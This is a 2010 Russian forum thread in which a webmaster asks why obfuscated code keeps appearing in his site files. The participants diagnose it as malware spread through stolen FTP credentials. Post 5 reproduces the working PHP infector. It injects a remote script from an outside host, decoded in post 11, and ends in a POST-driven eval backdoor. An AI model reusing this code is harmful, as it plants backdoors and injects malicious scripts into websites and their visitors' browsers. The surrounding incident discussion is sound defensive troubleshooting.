вредный код
1. николай (13.06.2010 / 12:32)народ помогите. беда у меня. обнаружил код зашифрованный. его там раньше не было. в каждом кайфиг этот код. я все проверил и почистил. сменил пароль. вчера целый день норм было сегодня повторилось. у меня 2 сайта на одном аке и в обоих ткое. как узнать как попадает этот код?
2. Константин (13.06.2010 / 12:33)
какие скрипты ставил? И хост какой..
3. Studentsov (13.06.2010 / 12:34)
Ты код покажи а мы разберёмся
4. Константин (13.06.2010 / 12:35)
Studentsov (Сегодня / 12:34)тогда сразу и бутылку.
Ты код покажи а мы разберёмся
5. николай (13.06.2010 / 12:36)
2 на одном соцка стоит давно уже. дыр нет в ней. на втором зц это началось после того как поставил зц вот этот код расшифрованый if(!function_exists('zc9')){function zc9($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http
?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2wtd2lzZS5jby5qcC9zdXBlci1qc2Evcm9nb19tbGQucGhwID48L3NjcmlwdD4='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function zc92($a,$b,$c,$d){global$zc91;$s=array();if(function_exists($zc91))call_user_func($zc91,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='zc9')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('zc9');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$zc9l=(($a=@set_error_handler('zc92'))!='zc92')?$a:0;eval(base64_decode($_POST['e'])
6. Константин (13.06.2010 / 12:42)
может стоит скрипт который перезаписывает файлы..
7. Studentsov (13.06.2010 / 12:43)
Бэкдор это
eval(base64_decode($_POST['e']))
8. николай (13.06.2010 / 12:48)
skamsk (Сегодня / 12:42)скорее всего потому что этот код в 171 файле. в ручную не реально каждый день его вставлять. ну если конечно него терпения нет.
может стоит скрипт который перезаписывает файлы..
9. николай (13.06.2010 / 12:50)
skamsk (Сегодня / 12:39)я не жалуюсь на него я же написал что к хосту вопросов нет.
странно.. Вот тут тоже один эмо на мой хост жаловался с такой же проблемой.мол я вставляю ему свой код..
10. Константин (13.06.2010 / 12:52)
Studentsov (Сегодня / 12:43)натуре
Бэкдор это
11. Sonikflame (13.06.2010 / 13:10)
$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2wtd2lzZS5jby5qcC9zdXBlci1qc2Evcm9nb19tbGQucGhwID48L3NjcmlwdD4='),'',вот расшифровка
<script src=http://l-wise.co.jp/super-jsa/rogo_mld.php ></script>
делайте выводы
12. ктулху (13.06.2010 / 15:12)
Японцы... Знаком с этим случаем... тоже посоветовал проверять комп...
От себя посоветую не использовать частоиспользуемые FTP клиенты (расчёт на массовость)
"Советуем пользоваться sftp-клиентом WinSCP, скачать можно по ссылке:
http://winscp.net/eng/download.php" - именно так я писал в блоге хостинга, жаль что мало кто прислушивается. Я могу попробовать вычистить код автоматизированными средствами (Благо они есть), но средства пока не опробованны, и может затереть весь акк. Ищи скрипт который прописывает всю эту шляпу, хотя сам щас тоже посмотрю, наверняка известно время изменения файлов.
UPD: ТС уже видимо бэкап залил, или вычистил... ничего не нашло
13. николай (13.06.2010 / 15:57)
15 да я снес все и восстановил бек ап за 1 число. блог я читал. и не пользуюсь сервисами. я тоталом пользуюсь хотя и WinSCP скачал. не удобно не привычно скорее всего. комп вчера проверял каспером (почистил) после чистки сменил пароль и удалил все лишне файлов перед ном проверил все было норм. утром проверил 171 зараженный файл.
14. Azzido (13.06.2010 / 16:43)
16, тотал коммандер небезопасно хранит пароли ftp
15. николай (13.06.2010 / 16:51)
17 а что надежно?
16. Стас (13.06.2010 / 22:40)
флешХП без установки на пк...портабл версия
17. Вантуз-мен (14.06.2010 / 01:54)
возможно это и вирус, советую почистить комп и поменять все пароли от фтп
18. Владимир (14.06.2010 / 01:58)
16, дык тотал коммандер - рекордсмен среди фтп-менеджеров по количеству троянов для него
а у кого-нибудь еще есть фтп-доступ к сайтам?
19. николай (14.06.2010 / 10:24)
21 нет только у меня. вроде проблема решена. ща сканю.
20. finall2 (14.06.2010 / 13:37)
А ведь действительно...какой вредный код-то))
А тому кто писал зц - ушки оторви то
21. Виталий (14.06.2010 / 16:26)
22. bygoodvin, скажи пожалуйста как ты решил проблемы по пункам скажи???у меня тоже ето код
22. ктулху (14.06.2010 / 22:11)
24, скажу за него: удалил вредоносный код, прочистил комп от троянов, поменял FTP клиент.
Список файлов он получил в панели хостинга (но у тебя возможно такого нет, даже скорее всего)
23. Иосиф Джугашвили (15.06.2010 / 00:33)
skamsk (13.06.10 / 12:39)Слыш!!!Эмо ты в зеркале увидишь http://visavi.net/forum/topic.php?tid=10095&
странно.. Вот тут тоже один эмо на мой хост жаловался с такой же проблемой.мол я вставляю ему свой код..
24. Иосиф Джугашвили (15.06.2010 / 00:39)
7. skamsk, именно на твоем хосте такая х р е н ь была... я ставил голый мотор 19,05 и код появился во всех индексах сайта ... хочешь сказать что мотор такой дырявый что кто то пришел и впаял его туда???
и у витали на сайте тоже этот код был во всех индексах.. мы на одном акке с ним были... у него тоже мотор стоял 19,05 без чепухи лишней...
25. Иосиф Джугашвили (15.06.2010 / 00:45)
18. bygoodvin, ха... кстати...я помню ты мне говорил что антивиром воще не пользуешься... молодец виталька...
26. ктулху (15.06.2010 / 01:59)
27, хостинг тут не причём. Просто ты словил виря и он спёр пароли от FTP.
27. Иосиф Джугашвили (15.06.2010 / 03:01)
ShiftBHT_есть чо7 (Сегодня / 01:59)Да почему я то словил??? У меня на компе надежность на высшем уровне в отличие от автора темы из-за которого и мой сайт пострадал
27, хостинг тут не причём. Просто ты словил виря и он спёр пароли от FTP.
28. ктулху (15.06.2010 / 03:51)
30, вот вот, вас таких самоуверенных вагон и маленькая тележка
29. Иосиф Джугашвили (15.06.2010 / 09:56)
ShiftBHT_есть чо7 (Сегодня / 03:51)Это не самоуверенность а факт... У меня и фаерфол стоит на максимальную защиту и лицензионная версия доктор веба стоит и все ок а автор темы мне сам говорил что антивиром не пользуется и после этого началась эта хня с кодом на сайтe его и мое
30, вот вот, вас таких самоуверенных вагон и маленькая тележка
30. Иосиф Джугашвили (15.06.2010 / 09:57)
Мы на одном акке были
31. Azzido (15.06.2010 / 10:12)
32, под сомнением у меня твой доктор веб
32. Иосиф Джугашвили (15.06.2010 / 12:25)
Azzido (Сегодня / 10:12)Не ребят вы че хотите сказать что значит автор темы вообще антивиром не пользуется и вирус не схватил а я значит схватил с антивиром ... Чуш то не несите
32, под сомнением у меня твой доктор веб
33. Maksim (15.06.2010 / 12:56)
Автор. Вирус у тебя на компе по любому. Червь или троян какойто. Читал когдато статью. Принцип его работы с***ить данные для доступа фтп а там уже изменять твои файлы. Ты не один такой кстати
мне месяца 3 назад пацип писал с такой же проблемой. Только у него при изменении файлов вирь чето тупил и постоянно были ошибки в синтаксисе пхп. Если найду статью ссылку кину...
34. Иосиф Джугашвили (15.06.2010 / 16:32)
Автор(Виталий) просто антивир себе не ставил из-за этого пострадали два домена которые попали в баню гугла.. Его сайт и мой ... А я грешил на хост... Скамск , приношу извинения!
35. ктулху (15.06.2010 / 16:54)
Я же говорю... давно уже такая вирусня бродит. я ещё года 2-3 назад видел, если не больше
36. Neformat (15.06.2010 / 16:59)
Сколько раз говорили, не храните пароли от фтпшников в менеджерах фтп (тем более в тотал командере).
37. ктулху (15.06.2010 / 17:46)
Neformat (Сегодня / 18:59)Не говори... учишь учишь, кулаки уже болят
Сколько раз говорили, не храните пароли от фтпшников в менеджерах фтп (тем более в тотал командере).
38. Константин (28.06.2010 / 09:00)
35. ...Smith...,как бы на будущее.не знаешь молчи.и не надо обвинять меня. Могу дать и давал вроде уже тебе отзывы своих клиентов. Все абсолютно довольны.
39. Zдешний (28.06.2010 / 09:05)
...Smith... (15.06.10 / 09:56)доктор веб лажа(((
Это не самоуверенность а факт... У меня и фаерфол стоит на максимальную защиту и лицензионная версия доктор веба стоит и все ок а автор темы мне сам говорил что антивиром не пользуется и после этого началась эта хня с кодом на сайтe его и мое
40. Tony (28.06.2010 / 09:06)
skamsk (Сегодня / 09:00)
35. ...Smith..., Слушай кретин..тебе дать проверку сервера? И отзывы клиентов? На моем хосте все чисто поэтому идиот будь добр не оскорбляй И не надо тут говорить что хост в чем то виноват.. Или ты еще скажешь что этот код я сам вшил клиенту.. Бгг
Вот так вот тоже говорить не надо, даже опытных ломают (пример недавно похекали Воланда, через пхпмайадмин) так что никто как видишь не застрахован. Мне ровно на данную тему, но утверждать что всё чисто и нет дыр это не правильно.
41. Tony (28.06.2010 / 09:07)
...Smith... (15.06.10 / 12:25)
Не ребят вы че хотите сказать что значит автор темы вообще антивиром не пользуется и вирус не схватил а я значит схватил с антивиром ... Чуш то не несите
Ищи проблемму в себе) возьми вдс и настрой как пологается и тогда уже никого кроме себя винить не надо будет. знаешь старую сицилийскую поговорку: "хочешь делать хорошо - делай сам".
42. ктулху (28.06.2010 / 09:43)
-Tony- (Сегодня / 11:07)Сколько уже таких самоделкиных поломано? то-то же..
Ищи проблемму в себе) возьми вдс и настрой как пологается и тогда уже никого кроме себя винить не надо будет. знаешь старую сицилийскую поговорку: "хочешь делать хорошо - делай сам".
43. Tony (28.06.2010 / 09:47)
ShiftBHT_есть чо7 (Сегодня / 09:43)
Сколько уже таких самоделкиных поломано? то-то же..
зато вся отвественность на себе. как настроил так и получай)
44. ктулху (28.06.2010 / 10:33)
99.9% вап мастеров получат УГ, если действовать таким методом.
Я думаю не многим станет легче если они будут сами в этом виноваты
45. Apeccc (28.06.2010 / 11:17)
Аррргх (Сегодня / 09:05)Факты в студию.
доктор веб лажа(((
46. Zдешний (28.06.2010 / 12:45)
Apec (Сегодня / 11:17)ни одного найденного вируса с ним не было. при ежедневных обновлениях баз. поставил фигню - 17 штук нашло
Факты в студию.
47. Apeccc (28.06.2010 / 12:59)
49. Аррргх, хз, у меня отлично работает
48. Женек (28.06.2010 / 16:50)
Ребят, не спорьте по поводу докторов вебов, гавновирусов и т.д. ...Smith... уверен что зашищен хотя бы на 90%? Если ты в этом уверен, тогда ВОН ИЗ ОБЩЕСТВА! Нет такого места, куда не мог бы попасть вирус.... ты хоть под земплю заройся... но если у тебя есть флешка + интернет, то ты обречен... Не нашел вирусов доктор веб? знаешь как у меня поставлена защита? Основной антивирус + 2 вспомогательных запускаются раз в месяц и чистят, каждый найдет свои вирусы... Каждый что то успустит.... Ищи у себя вирусы... Лично я частенько отлавливаю у людей вирусы пропущенные касперским, заменяю его avast!ом и мой личный выбор это avast! Есть мнения что антивирус не надежен, но показатель мой таков
- на версии 4.8 система прожила 10 месяцев
- на версиях 5+ система работает еще 10+ месяцев...
В итоге у меня сейчас система без переустановки служит более полу года... ПРи этом постоянное общение с интернетом и флешками из общественных мест (колледжи, работы и т.д. "рассадники вирусов"), но я не говорю что я защищен на все 100%... Просто я стараюсь отсекать случаи подобные... и сперва начал бы икать проблему у себя...
49. Женек (28.06.2010 / 16:52)
мой личный выбор антивирусного обеспечения
Основной антивирус: Avast! 5.0.xxx internet security
Дополнительные:KIS 2010, IObit Pro (запускаю раз в месяц или два для полной проверки)
З.Ы. DrWeb достаточно хороший антивирус, но его одного может быть не достаточно...
50. KOZZ (28.06.2010 / 17:46)
51, тебе надо машины продавать xD ты даже оку опишешь как бугатти xD
51. Женек (28.06.2010 / 17:57)
Грубиян (Сегодня / 17:46)я просто говорю то что наблюдаю на опыте, а не то что сказали друзья о том антивирусе или то что написано на форумах на другом...
51, тебе надо машины продавать xD ты даже оку опишешь как бугатти xD
з.ы. а чем ока не бугатти? xD ты хочешь об этом поговорить? xDDD
52. Zдешний (28.06.2010 / 18:10)
Apec (Сегодня / 12:59)что-то находит, а что-то ведь и не замечает)
49. Аррргх, хз, у меня отлично работает
53. Tony (28.06.2010 / 18:59)
такой ламо-вирус найдёт либой антивирь...
54. KOZZ (28.06.2010 / 18:59)
54, нее, спс )))
55. KOZZ (28.06.2010 / 19:00)
56, мало ли как он там реализован
56. Tony (28.06.2010 / 19:02)
Грубиян (Сегодня / 19:00)
56, мало ли как он там реализован
судя по тому что я прочёл в этой теме, если вирус как говорит Шифт старый, то он во всех базах, всех антивирей есть.
57. Женек (28.06.2010 / 23:02)
-Tony- (Сегодня / 19:02)если он старый, то не значит что он один и что он не модифицированный....
судя по тому что я прочёл в этой теме, если вирус как говорит Шифт старый, то он во всех базах, всех антивирей есть.
58. ктулху (29.06.2010 / 01:06)
Да, вирусы же и криптовать можно
59. finall2 (29.06.2010 / 01:55)
Да и не только вирусы
60. Tony (29.06.2010 / 05:25)
Basters (Вчера / 23:02)
если он старый, то не значит что он один и что он не модифицированный....
о да, ТС большая шишка чтобы специально для него писать эксклюзивный вирус, которого ещё нет в базах, не спорю такие вирусы есть но их пишут для разового применения и для конкретной жертвы, серийные же вирусы в 99% случаях уже есть в базе.
61. Женек (29.06.2010 / 14:05)
-Tony- (Сегодня / 05:25)какой ты умныи... Сенсей я с вас куею, по вашим суждениям, мы все в безопасности от вирусов. Но нибуя страшного что ежедневно рождаются сотни вирусов... Они же уже у нас в базе....
о да, ТС большая шишка чтобы специально для него писать эксклюзивный вирус, которого ещё нет в базах, не спорю такие вирусы есть но их пишут для разового применения и для конкретной жертвы, серийные же вирусы в 99% случаях уже есть в базе.
62. ктулху (29.06.2010 / 14:32)
-Tony- (Сегодня / 07:25)Ты тоже немного не прав.
о да, ТС большая шишка чтобы специально для него писать эксклюзивный вирус, которого ещё нет в базах, не спорю такие вирусы есть но их пишут для разового применения и для конкретной жертвы, серийные же вирусы в 99% случаях уже есть в базе.
Вирус же не сразу в БД антивирей попадает... для начала его схватит добрая половина населения, и только потом кто-то догадается отослать в лабораторию
63. Tony (29.06.2010 / 14:41)
ShiftBHT_есть чо7 (Сегодня / 14:32)
Ты тоже немного не прав.
Вирус же не сразу в БД антивирей попадает... для начала его схватит добрая половина населения, и только потом кто-то догадается отослать в лабораторию
я знаю это
про половину крнечено ты преувеличил) есть у известных антивирусных лабораторий целые отделы, работа которых направленна на то чтобы новые эпидемии подхватило как можно меньше людей, отсюда и идёт такое частое обновление баз (практически каждый час)
URL: https://visavi.net/topics/10447